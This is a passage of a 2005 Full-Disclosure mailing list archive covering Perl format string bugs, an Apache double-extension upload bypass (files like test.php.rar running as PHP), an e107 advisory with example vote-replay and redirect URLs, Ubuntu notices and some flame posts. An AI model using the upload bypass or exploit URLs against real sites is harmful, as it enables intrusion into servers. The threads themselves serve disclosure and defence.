19:58:33 -0500 Subject: [Full-disclosure] have you ever been BluePIMped? Message-ID: <43923F39.4030801@digitalmunition.com> Chapter 9 style ala Stealing the network. enjoy... -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: BluePIMped.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/8fa7756b/attachment.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: BluePIMped.diff Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/8fa7756b/attachment.ksh From mjp at securepipe.com Sun Dec 4 02:49:47 2005 From: mjp at securepipe.com (Michael J. Pomraning) Date: Sat, 3 Dec 2005 20:49:47 -0600 (CST) Subject: [Full-disclosure] Re: Format String Vulnerabilities in Perl Programs In-Reply-To: <200512020856.jB28uEFR011262@linus.mitre.org> References: <200512020856.jB28uEFR011262@linus.mitre.org> Message-ID: On Fri, 2 Dec 2005, Steven M. Christey wrote: > In particular, the sprintf() and printf() functions in Perl can be > abused if an attacker can control the contents of the format string. > Since similar functions are used in C, it is possible that these > functions will be used more frequently by C programmers who are new to > Perl. <> > - for each programming language, identify and publicize all builtin > or common library functions that use format strings. For Perl projects, I'd also nominate syslog(), from the standard Sys::Syslog module, for special attention. It's common in *NIX environments regardless of programmers' backgrounds and is extremely likely to be called with untrusted data interpolated directly in the format string argument -- syslog("info", "A user said $user_input"), for example. Regards, Mike From stan.bubrouski at gmail.com Sun Dec 4 06:44:29 2005 From: stan.bubrouski at gmail.com (Stan Bubrouski) Date: Sun, 4 Dec 2005 01:44:29 -0500 Subject: [Full-disclosure] Re: Format String Vulnerabilities in Perl Programs In-Reply-To: References: <200512020856.jB28uEFR011262@linus.mitre.org> Message-ID: <122827b90512032244x7b39d05h4c80bf64c3a49a6e@mail.gmail.com> On 12/3/05, Michael J. Pomraning wrote: > For Perl projects, I'd also nominate syslog(), from the standard Sys::Syslog > module, for special attention. It's common in *NIX environments regardless > of programmers' backgrounds and is extremely likely to be called with > untrusted data interpolated directly in the format string argument -- > syslog("info", "A user said $user_input"), for example. > This has been mentioned numerous times, including this week (?), nothing new. -sb > Regards, > Mike > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From umphress at gmail.com Sun Dec 4 07:47:56 2005 From: umphress at gmail.com (Chris Umphress) Date: Sat, 3 Dec 2005 23:47:56 -0800 Subject: [Full-disclosure] Format String Vulnerabilities in Perl Programs In-Reply-To: <200512020856.jB28uEFR011262@linus.mitre.org> References: <200512020856.jB28uEFR011262@linus.mitre.org> Message-ID: <1f29b8940512032347j19a272dftbdd9b79b0d639d57@mail.gmail.com> On 12/2/05, Steven M. Christey wrote: > > *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* > Format String Vulnerabilities in Perl Programs > *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* Almost all of the statements refer to a number of programming languages if thought is not put into the program. Security requires thought. A program that is not thought out will not be secure, and the language it is written in cannot protect against this. Anyhow, I get ahead of myself. > The possibility of CRLF injection was theorized, but a casual > investigation was not successful. \r\n ?? \x0d\x0a ?? > ********************************************************************** > 4. Some Discussion on Format Strings and the Taint Checker > ********************************************************************** > > In 5.004: > > The taint checker apparently does not flag filenames as tainted > (e.g. as obtained from the readdir() function). Presumably, other > types of "indirect input" may not be tainted. However, it does > identify more direct sources of input such as stdin and environment > variables. It shouldn't have to. As Linus Torvalds says -- You should think through your code rather than expecting a tool to find the problem for you [1]. > Notes on Detecting Vulnerabilities in Source Code > ------------------------------------------------- > > Detection of suspicious code is slightly more difficult than it is for > C code. Constant strings can contain Perl entities such as variables > or references, which are inserted into the string before it is passed > to printf/sprintf. > > $fmt = ; > printf("THIS IS A POTENTIALLY VULNERABLE $fmt FORMAT STRING\n"); That is probably the closest thing to a feasible mistake for someone who is thinking about the code they are writing (IMO). If you aren't performing a string insertion of some kind, "print" is far better. While I do understand the argument to some degree, "print" is the most common way to display text (from my own experience, "print" usage is much more common in scripting languages than printf). [1] Linus Torvalds, Linux Kernel Mailing List, Mar 19 2000, http://www.uwsg.iu.edu/hypermail/linux/kernel/0003.2/0939.html -- Chris Umphress From coley at linus.mitre.org Sun Dec 4 06:49:25 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 4 Dec 2005 01:49:25 -0500 (EST) Subject: [Full-disclosure] Re: Format String Vulnerabilities in Perl Programs In-Reply-To: <122827b90512032244x7b39d05h4c80bf64c3a49a6e@mail.gmail.com> References: <200512020856.jB28uEFR011262@linus.mitre.org> <122827b90512032244x7b39d05h4c80bf64c3a49a6e@mail.gmail.com> Message-ID: It was mentioned this week, but not in my paper, so it didn't hurt for it to be mentioned again :) - Steve On Sun, 4 Dec 2005, Stan Bubrouski wrote: > On 12/3/05, Michael J. Pomraning wrote: > > > For Perl projects, I'd also nominate syslog(), from the standard Sys::Syslog > > module, for special attention. It's common in *NIX environments regardless > > of programmers' backgrounds and is extremely likely to be called with > > untrusted data interpolated directly in the format string argument -- > > syslog("info", "A user said $user_input"), for example. > > > > This has been mentioned numerous times, including this week (?), nothing new. > > -sb From coley at linus.mitre.org Sun Dec 4 19:50:48 2005 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 4 Dec 2005 14:50:48 -0500 (EST) Subject: [Full-disclosure] Format String Vulnerabilities in Perl Programs In-Reply-To: <1f29b8940512032347j19a272dftbdd9b79b0d639d57@mail.gmail.com> References: <200512020856.jB28uEFR011262@linus.mitre.org> <1f29b8940512032347j19a272dftbdd9b79b0d639d57@mail.gmail.com> Message-ID: On Sat, 3 Dec 2005, Chris Umphress wrote: > Almost all of the statements refer to a number of programming > languages if thought is not put into the program. Security requires > thought. Agreed, but every once in a while we run across things that people don't usually think about. > > The possibility of CRLF injection was theorized, but a casual > > investigation was not successful. > > \r\n ?? \x0d\x0a ?? This was 3 years ago and I don't remember the details, but I tried something like \r\n, \\r\\n, etc. It appears that the "\n" are converted during initial interpretation, not execution. I didn't look too deeply into it. However, I just realized that you might be able to feed a 0x0A value into a "%c" specifier: $username = "%c"; $score = 10; printf "USER = $username; SCORE = %03d\n", $score; This produces: USER = ; SCORE = 000 > > ********************************************************************** > > 4. Some Discussion on Format Strings and the Taint Checker > > ********************************************************************** > > It shouldn't have to. As Linus Torvalds says -- You should think > through your code rather than expecting a tool to find the problem for > you [1]. Agreed as well. However, security mechanisms are useful in the cases in which the programmer still makes a mistake despite best efforts, so their limitations are noteworthy. This is roughly equivalent to the limitation of canary-based overflow protection mechanisms. They don't work in every case. > > $fmt = ; > > printf("THIS IS A POTENTIALLY VULNERABLE $fmt FORMAT STRING\n"); > > That is probably the closest thing to a feasible mistake for someone > who is thinking about the code they are writing (IMO). If you aren't > performing a string insertion of some kind, "print" is far better. > While I do understand the argument to some degree, "print" is the most > common way to display text (from my own experience, "print" usage is > much more common in scripting languages than printf). It's that way based on what I've seen, too, so maybe the problem appears more rarely than it does in C. With respect to programming languages in general, I would think that if the language provides very flexible, easy-to-use ways of formatting outputs - like Perl and PHP - then format string issues might be less common, since there would be less need to use printf-style functions. I don't know Javascript/Java well at all, but they might be more susceptible since it looks like a number of printf-style packages are available to make up for the real (or perceived) lack of built-in formatting support. - Steve From ivanhec at gmail.com Mon Dec 5 02:01:36 2005 From: ivanhec at gmail.com (Ivan .) Date: Mon, 5 Dec 2005 13:01:36 +1100 Subject: [Full-disclosure] IT security professionals in demand in 2006 Message-ID: <6450e99d0512041801p4adf24bclb8deaeefd203fa9a@mail.gmail.com> http://www.computerworld.com.au/index.php/id;923889191;fp;16;fpid;0 From xploitable at gmail.com Mon Dec 5 02:57:57 2005 From: xploitable at gmail.com (n3td3v) Date: Mon, 5 Dec 2005 02:57:57 +0000 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <20051203212012.21398.qmail@cgisecurity.net> References: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> <20051203212012.21398.qmail@cgisecurity.net> Message-ID: <4b6ee9310512041857u60646b75ua7dd6b43b6d9b9e7@mail.gmail.com> [drama] [wild imagination] ***Millions of e-mail addresses exposed to hackers*** *Hacker gets access to every group, made easier by his/her worm script (likely a hacker would do this) *Hacker harvests all e-mail addresses exposed and sells to spammer (likely a hacker would do this) *Hacker deletes all groups on network, made easier by his/her worm script (unlikely a hacker would do this) Assuming the hacker still has access to administrative controls for every group, he/she can conitinue to harvest new e-mail addresses and delete groups with the flaw patched. How much is an e-mail list of that size worth to spammers? I'm sure a hacker always fancied being a millionaire. [/wild imagination] [/drama] On 12/3/05, bugtraq at cgisecurity.net wrote: > XSS is 'starting' to get fairly useful. From infosecbofh at gmail.com Mon Dec 5 03:37:48 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Sun, 4 Dec 2005 19:37:48 -0800 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <20051203212012.21398.qmail@cgisecurity.net> References: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> <20051203212012.21398.qmail@cgisecurity.net> Message-ID: <2be58a30512041937r6ba1fb93oc08fde136bd4930a@mail.gmail.com> "XSS is 'starting' to get fairly useful." Absolutely, I agree. But in this specifc case, its not all that useful. From jpierini at hotmail.com Mon Dec 5 04:18:35 2005 From: jpierini at hotmail.com (Joseph Pierini) Date: Sun, 4 Dec 2005 20:18:35 -0800 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <2be58a30512041937r6ba1fb93oc08fde136bd4930a@mail.gmail.com> Message-ID: >Absolutely, I agree. But in this specifc case, its not all that useful. Please, for the love of god, do not get him riled up again. Can we all just say "N3td3v, thanks for the info. Wow, it must have been an exhaustive search to find that needle in a haystack. I'm sure Google appreciates your time and effort." Now back away and don't make any sudden movements any maybe, just maybe, FD won't be flooded with the noise we've had to put up with for weeks. Thanks, JP From iago at valhallalegends.com Mon Dec 5 04:32:49 2005 From: iago at valhallalegends.com (Ron) Date: Sun, 04 Dec 2005 22:32:49 -0600 Subject: [Full-disclosure] Bug with .php extension? Message-ID: <4393C2F1.9030200@valhallalegends.com> I'm not sure whether this is something that's well known, but I've never seen anything about it, and I nearly got burned by it, so I figured I'd post it here. In Apache 1.3.33 (untested on any other version), if you have a file called file.php.bak, and you navigate to it in the browser, it will run on the server as a .php file. This works with any extension that isn't known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.) This can impact upload scripts, if they don't rename. I had a script that was only allowing a very limited number of file names, including .rar. I realized that I could upload the file test.php.rar, as demonstrated here: http://www.javaop.com/~iago/test.php.rar (I assure you that that's a .php script, not just that text file). Resolution: If any script does that, it should be changed such that it renames any files, perhaps to a SHA1() hash of the filename, or a timestamp, or anything like that. This problem reminds me of a recent discussion about files like file.exe.txt in Windows. In general, that's good advice anyways, you shouldn't allow any kind of user specific filenames. But just in case somebody is making this mistake, be careful! As I said, I nearly got burnt by this, luckly I noticed it before anybody malicious did. Ron From umphress at gmail.com Mon Dec 5 05:25:23 2005 From: umphress at gmail.com (Chris Umphress) Date: Sun, 4 Dec 2005 21:25:23 -0800 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: <4393C2F1.9030200@valhallalegends.com> References: <4393C2F1.9030200@valhallalegends.com> Message-ID: <1f29b8940512042125y53d843f2j4c09d3a26607bb02@mail.gmail.com> On 12/4/05, Ron wrote: > I'm not sure whether this is something that's well known, but I've never > seen anything about it, and I nearly got burned by it, so I figured I'd > post it here. > > In Apache 1.3.33 (untested on any other version), if you have a file > called file.php.bak, and you navigate to it in the browser, it will run > on the server as a .php file. This works with any extension that isn't > known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.) > > This can impact upload scripts, if they don't rename. I had a script > that was only allowing a very limited number of file names, including > .rar. I realized that I could upload the file test.php.rar, as > demonstrated here: > http://www.javaop.com/~iago/test.php.rar > > (I assure you that that's a .php script, not just that text file). Whoa, that's interesting. Testing on Apache 2.0.54 gets the same result. $ echo "">/path/to/htdocs/test.php.rar $ wget http://localhost/test.php.rar -O /tmp/test.txt $ cat /tmp/test.text;echo Prints "test". I hadn't heard about this. Thankfully, my webserver isn't susceptible to such attacks, let me show you why. In my httpd.conf file, I have: Alias /uploads/ "/var/www/htdocs/" Alias /uploads "/var/www/htdocs/" First, I'm not naming the real directory.... Second, if someone did find the upload directory, they would be redirected to the root of the server. They couldn't run the script on my server no matter how hard they tried. Thanks for the information. -- Chris Umphress From ghosts at gmail.com Mon Dec 5 08:23:33 2005 From: ghosts at gmail.com (ghost) Date: Mon, 5 Dec 2005 00:23:33 -0800 Subject: [Full-disclosure] Google is vulnerable from XSS attack In-Reply-To: <4b6ee9310512041857u60646b75ua7dd6b43b6d9b9e7@mail.gmail.com> References: <2be58a30512030155q5a37a4c3m1a6834e1434ac932@mail.gmail.com> <20051203212012.21398.qmail@cgisecurity.net> <4b6ee9310512041857u60646b75ua7dd6b43b6d9b9e7@mail.gmail.com> Message-ID: <6f4bb0b50512050023k6daae201yb41f2cab872c1301@mail.gmail.com> shut, the, fuck, up, yellow, bus, rider. smooches! On 12/4/05, n3td3v wrote: > [drama] > [idiot in the wild wild] > From sk at groundzero-security.com Mon Dec 5 02:45:18 2005 From: sk at groundzero-security.com (sk) Date: Mon, 5 Dec 2005 03:45:18 +0100 Subject: [Full-disclosure] IT security professionals in demand in 2006 References: <6450e99d0512041801p4adf24bclb8deaeefd203fa9a@mail.gmail.com> Message-ID: <00bc01c5f945$fc232af0$0100a8c0@nuclearwinter> CISSP is bullshit. as eeye said 99% of the security consultants do their pen-tests with automated tools which is pathetic in my opinion. if you cant write exploits, you are no professional, more like a steam blower. how can someone be professional when he doesnt even understand how an exploit works in deep? what if there are custom scripts or exotic daemons installed? without beeing able to audit code and understand how certain bugs are beeing exploited, how can someone think he got enough clue to do a professional security audit? its just a rip off of the customers as simple as that. or would you pay someone to run an automated tool against your host, sit back and wait till a nice pdf statistic is generated so he got something to present to you? of course you wouldnt. in the 90s the people still had to learn on their own and all the mainstream hackers who speak at your conventions didnt learn their knowledge from stupid class rooms. everyone who thinks hes a security professional or even a hacker after he made some certs, is just living in a dream world. then again the media plays well with the steam blowers so they can make a nice living.. sorry i just had to say that since its going on my nerves how all these people suddenly think their stupid certs make em special, but then if it comes to knowledge everyone is cluless... -sk ----- Original Message ----- From: "Ivan ." To: Sent: Monday, December 05, 2005 3:01 AM Subject: [Full-disclosure] IT security professionals in demand in 2006 > http://www.computerworld.com.au/index.php/id;923889191;fp;16;fpid;0 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From maru at scip.ch Mon Dec 5 09:07:23 2005 From: maru at scip.ch (Marc Ruef) Date: Mon, 5 Dec 2005 10:07:23 +0100 Subject: [Full-disclosure] [scip_Advisory] e107 v0.6 rate.php manipulation Message-ID: <5F9D803B30A8E4418166E637D50E9E2A13A1CA@miraculix.scip.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 e107 v0.6 rate.php voting manipulation and forwarding vulnerability scip AG Vulnerability Advisory (11/10/2005) http://www.scip.ch I. INTRODUCTION e107 is the name of an open-source content management system (cms) that relies on php and sql. More Information are available at the official project web site: http://e107.org II. DESCRIPTION Marc Ruef detected two flaws in rate.php. This file is responsible for the votes of the users to rate content (e.g. the downloads). This voting is served by default with an option combobox in download.php for example. If the user has already rated a content, his user id is saved to the table e107_rate in the according rate data set. If an user is opening a download over download.php, the php script checks in the background if the user has already voted yet. If not, so the user id is not remarked in the rate data set, the option combobox is shown - If he has already voted, a place holder text string is used. This pre-detection tries to defend against multiple votes. If an user selected a value in the option combobox, the browser connects to rate.php and sends the rating data to this script as an HTTP GET query string. The first problem relies in the possibility of reply attacks. An attacker is able to call this rate.php url again and again (e.g. using the direct link and not relying the real user web frontend in download.php). Thus, a manipulation of the votes may be possible. Because in the default installation of the software the web frontend does not show who has already voted, a deeper investigation on the database would be nescessary. Furthermore the same php script is vulnerable to a simple redirection/forwarding attack. If an user is rating a content, he is opening the php script rate.php with some data in the HTTP GET query string variable. One of the data provided is the destination directory after successfull rating. An attacker may be able to create a malicous url and forward a victim to a potential dangerous content. It is very important to remark that in the default installation always the variable e_BASE is set before the forwarding url. In this string the base address of the web site is saved (e.g. http://www.scip.ch). So an attacker is just able to define the directory names, file names and HTTP GET query string variables. A possible scenario for misuse may a social engineering attack or cross site scripting attempt. These always rely on the flaw in other parts of the web site. III. EXPLOITATION The following example url let us to vote for the content "download" with the id "42" every time we are accessing this url. The last integer defines the rate value (between 1 and 10). http://www.scip.ch/rate.php?download^42^/download.php?view.42^5 The following example url let us to vote for a content and afterwards we are forwarded to the script /etc/passwd. All the other data is still used for the rating procedure (e.g. saving the new value in the rate table). http://www.scip.ch/rate.php?download^23^/etc/passwd^1 IV. IMPACT Manipulation of ratings is not a real security problem for environments using e107. But is is a real threat for the reliability and integrity of all the ratings within e107. An attacker may be able to compromise a rating contest by voting multiple times for not liked or very liked content. The possibility of the forwarding attack may gain elevated privileges for an attacker, as long as he is possible to exploit another vulnerability on the target web server. Due the fact just the destination directory can be defined, no cross plattform attacks are possible. V. DETECTION Slight changes on the code of the affected php code may be able to detect and prevent the successfully attack. See VI for more technical details. VI. WORKAROUND The e107 team has provided a bugfix for the new release 0.7 in the CVS. To prevent multiple votes in earlier versions the following lines should be added to rate.php. These check once again, if the user has already voted or not. If this is a multiple rating attempt, a forwarding to the web site without adding the new data to the rate table is used instead. require_once(e_HANDLER."rate_class.php"); $rater = new rater; if(!$rater -> checkrated($qs[0], $qs[1]) == FALSE){ header("location:".e_BASE.$qs[2]); exit; } The workaround for a false redirection can be handled by comparing the data for the data base and the forwarding data (e.g. if the table download is used then the forwarding should go to download.php anyway). If they are not the same, the forwarding should not be used. Due the fact in e107 prior 0.7 ratings for downloads are possible only, adding the following line in rate.php will override any other forwarding url. $qs[2] = e_BASE."download.php?view.".$qs[1]; Please be aware, these code lines are just suggestions and not official patches. VII. VENDOR RESPONSE The e107 team was aware of the flaws for a long time. Due the fact the risk of the successfull exploitation was very low, no further countermeasures were implemented. But at this time at least the flaw of the multiple ratings has been eliminated. See VI for more details. VIII. SOURCES scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl computec.ch document data base (german) http://www.computec.ch/download.php?list.26 http://www.computec.ch/download.php?list.25 IX. DISCLOSURE TIMELINE 02/08/2005 First detection of the flaw by Marc Ruef 08/23/2005 Semi-public announcement of the flaw in the computec.ch forum by Disenchant 11/07/2005 Technical analysis of the problem and developement of bugfixes by Marc Ruef 26/09/2005 V3 posted the "old" problem of multiple rates in the bugtrack of e107v7[1] 12/05/2005 Public advisory by Marc Ruef with scip AG X. CREDITS The flaw of the rate reply attack was discovered and analyzed by Marc Ruef and Sven Vetsch. The vulnerability of the redirection and forwarding during rating was analyzed by Marc Ruef. Marc Ruef, scip AG maru-at-scip.ch http://www.scip.ch Sven Vetsch admin-at-disenchant.ch http://www.disenchant.ch A1. BIBLIOGRAPHY [1] http://e107.org/e107_plugins/bugtrack/bugtrack.php?1625.show A2. LEGAL NOTICES Copyright (c) 2005 by scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. -----BEGIN PGP SIGNATURE----- Version: PGP 8.0 Comment: http://www.scip.ch iQA/AwUBQ5QDURe5hzJzqVMhEQK2GACfcoePtivcmANoIRXurbGTIH9vXt0An02e M1l0gozHFvbAWw3WoNYU+n63 =VhT/ -----END PGP SIGNATURE----- From d.stanzani at gmail.com Mon Dec 5 10:24:52 2005 From: d.stanzani at gmail.com (Stanza) Date: Mon, 5 Dec 2005 11:24:52 +0100 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: <1f29b8940512042125y53d843f2j4c09d3a26607bb02@mail.gmail.com> References: <4393C2F1.9030200@valhallalegends.com> <1f29b8940512042125y53d843f2j4c09d3a26607bb02@mail.gmail.com> Message-ID: <7b93ce2b0512050224yf5a70e8h40294841b723f216@mail.gmail.com> I suppose this is a great bug. It work also on apache 2. If a user can upload a file and it's extension isn't associated to a mime-type, the server processes it as a php file.. Stanza On 12/5/05, Chris Umphress wrote: > On 12/4/05, Ron wrote: > > I'm not sure whether this is something that's well known, but I've never > > seen anything about it, and I nearly got burned by it, so I figured I'd > > post it here. > > > > In Apache 1.3.33 (untested on any other version), if you have a file > > called file.php.bak, and you navigate to it in the browser, it will run > > on the server as a .php file. This works with any extension that isn't > > known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.) > > > > This can impact upload scripts, if they don't rename. I had a script > > that was only allowing a very limited number of file names, including > > .rar. I realized that I could upload the file test.php.rar, as > > demonstrated here: > > http://www.javaop.com/~iago/test.php.rar > > > > (I assure you that that's a .php script, not just that text file). > > Whoa, that's interesting. Testing on Apache 2.0.54 gets the same result. > > $ echo "">/path/to/htdocs/test.php.rar > $ wget http://localhost/test.php.rar -O /tmp/test.txt > $ cat /tmp/test.text;echo > > Prints "test". I hadn't heard about this. Thankfully, my webserver > isn't susceptible to such attacks, let me show you why. In my > httpd.conf file, I have: > > Alias /uploads/ "/var/www/htdocs/" > Alias /uploads "/var/www/htdocs/" > > First, I'm not naming the real directory.... Second, if someone did > find the upload directory, they would be redirected to the root of the > server. They couldn't run the script on my server no matter how hard > they tried. > > Thanks for the information. > > -- > Chris Umphress > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Simon.Richter at hogyros.de Mon Dec 5 10:31:41 2005 From: Simon.Richter at hogyros.de (Simon Richter) Date: Mon, 05 Dec 2005 11:31:41 +0100 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: <4393C2F1.9030200@valhallalegends.com> References: <4393C2F1.9030200@valhallalegends.com> Message-ID: <4394170D.2020406@hogyros.de> Hello, Ron wrote: > In Apache 1.3.33 (untested on any other version), if you have a file > called file.php.bak, and you navigate to it in the browser, it will run > on the server as a .php file. This works with any extension that isn't > known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.) I would think this is related to "Options MultiViews", where a file generally has many suffixes (file type, language, compression, ...). Does this also happen to you (yes, I'm too lazy to try right now) if you turn MultiViews off? Nevertheless, good idea that script authors should possibly be aware that any suffix, not just the last, is interpreted. Simon -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 307 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/c3196236/attachment.bin From varcher at denyall.com Mon Dec 5 12:09:04 2005 From: varcher at denyall.com (Vincent Archer) Date: Mon, 5 Dec 2005 13:09:04 +0100 Subject: [Full-disclosure] FW: [MailServer Notification] Your .zip file has been blocked from entering the ScanSoft email environment. In-Reply-To: <20051202201848.2FD46231@lists.grok.org.uk> References: <20051202201848.2FD46231@lists.grok.org.uk> Message-ID: <20051205120904.GK15786@DAPCVA.da> On Sat, Dec 03, 2005 at 01:47:10AM +0530, Debasis Mohanty wrote: > Another funny statement is -> "Please rename your file to filename.zzp and > resend to ensure delivery." Works fine. The virus will not act on this suggestion, while a real user will see it and resubmit a new attachment. -- Vincent ARCHER varcher at denyall.com Tel : +33 (0)1 40 07 49 96 Fax : +33 (0)1 40 07 47 27 Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France From martin.pitt at canonical.com Mon Dec 5 12:56:20 2005 From: martin.pitt at canonical.com (Martin Pitt) Date: Mon, 5 Dec 2005 13:56:20 +0100 Subject: [Full-disclosure] [USN-223-1] Inkscape vulnerability Message-ID: <20051205125620.GC7886@piware.de> =========================================================== Ubuntu Security Notice USN-223-1 December 05, 2005 inkscape vulnerability CVE-2005-3885 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) The following packages are affected: inkscape The problem can be corrected by upgrading the affected package to version 0.40-2ubuntu1.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Javier Fern?ndez-Sanguino Pe?a discovered that Inkscape's ps2epsi.sh script, which converts PostScript files to Encapsulated PostScript format, creates a temporary file in an insecure way. A local attacker could exploit this with a symlink attack to create or overwrite arbitrary files with the privileges of the user running Inkscape. Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40-2ubuntu1.1.diff.gz Size/MD5: 7572 50ddba7ed014ae75870d1e87fcf8318f http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40-2ubuntu1.1.dsc Size/MD5: 859 e5630cb77d15e601517fe6a43451bbdb http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40.orig.tar.gz Size/MD5: 5292595 11c549c0ffdd45db9f9fe62dfec162ce amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40-2ubuntu1.1_amd64.deb Size/MD5: 3987574 67e8cc45c5b45fccae06c081ab59b5da i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40-2ubuntu1.1_i386.deb Size/MD5: 3898986 26b463fdc90342cd6418f103d6d1748e powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/inkscape/inkscape_0.40-2ubuntu1.1_powerpc.deb Size/MD5: 4107808 66d473b7c6ce5551f262006e83f40135 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/efd20867/attachment.bin From michael.ligh at mnin.org Mon Dec 5 12:59:08 2005 From: michael.ligh at mnin.org (Michael Ligh) Date: Mon, 5 Dec 2005 07:59:08 -0500 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: <4394170D.2020406@hogyros.de> References: <4393C2F1.9030200@valhallalegends.com> <4394170D.2020406@hogyros.de> Message-ID: <7df124a0512050459k31fe7467n7ade7f47a637890e@mail.gmail.com> I think this is due to Apache's mod_mime_magic: http://httpd.apache.org/docs/1.3/mod/mod_mime_magic.html Lots of phishers are using files named *.php.rar recently. On 12/5/05, Simon Richter wrote: > > Hello, > > Ron wrote: > > > In Apache 1.3.33 (untested on any other version), if you have a file > > called file.php.bak, and you navigate to it in the browser, it will run > > on the server as a .php file. This works with any extension that isn't > > known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.) > > I would think this is related to "Options MultiViews", where a file > generally has many suffixes (file type, language, compression, ...). > Does this also happen to you (yes, I'm too lazy to try right now) if you > turn MultiViews off? > > Nevertheless, good idea that script authors should possibly be aware > that any suffix, not just the last, is interpreted. > > Simon > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/285d7b4f/attachment.html From martin.pitt at canonical.com Mon Dec 5 13:02:31 2005 From: martin.pitt at canonical.com (Martin Pitt) Date: Mon, 5 Dec 2005 14:02:31 +0100 Subject: [Full-disclosure] [USN-180-2] MySQL 4.1 vulnerability Message-ID: <20051205130231.GD7886@piware.de> =========================================================== Ubuntu Security Notice USN-180-2 December 05, 2005 mysql-dfsg-4.1 vulnerability CVE-2005-2558 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 (Breezy Badger) The following packages are affected: mysql-server-4.1 The problem can be corrected by upgrading the affected package to version 4.1.12-1ubuntu3.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-180-1 fixed a vulnerability in the mysql-server package (which ships version 4.0). Version 4.1 is vulnerable against the same flaw. Please note that this package is not officially supported in Ubuntu 5.10. Origial advisory: "AppSecInc Team SHATTER discovered a buffer overflow in the "CREATE FUNCTION" statement. By specifying a specially crafted long function name, a local or remote attacker with function creation privileges could crash the server or execute arbitrary code with server privileges. However, the right to create function is usually not granted to untrusted users." Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.12-1ubuntu3.1.diff.gz Size/MD5: 160353 1f6bdfc757592d25e6e5e0c40405c68a http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.12-1ubuntu3.1.dsc Size/MD5: 1024 6df2740a688ebd8330bab80bcafa6f9a http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.12.orig.tar.gz Size/MD5: 15921909 c7b83a19bd8a4f42d5d64c239d05121f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/mysql-common-4.1_4.1.12-1ubuntu3.1_all.deb Size/MD5: 36022 86a50a42f1685ad909ae5674d641b6d6 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.12-1ubuntu3.1_amd64.deb Size/MD5: 5830550 34427f9076358567e0b0104b83e236f9 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.12-1ubuntu3.1_amd64.deb Size/MD5: 1539274 09ce1eebeae5d58115c8a8b10b40511b 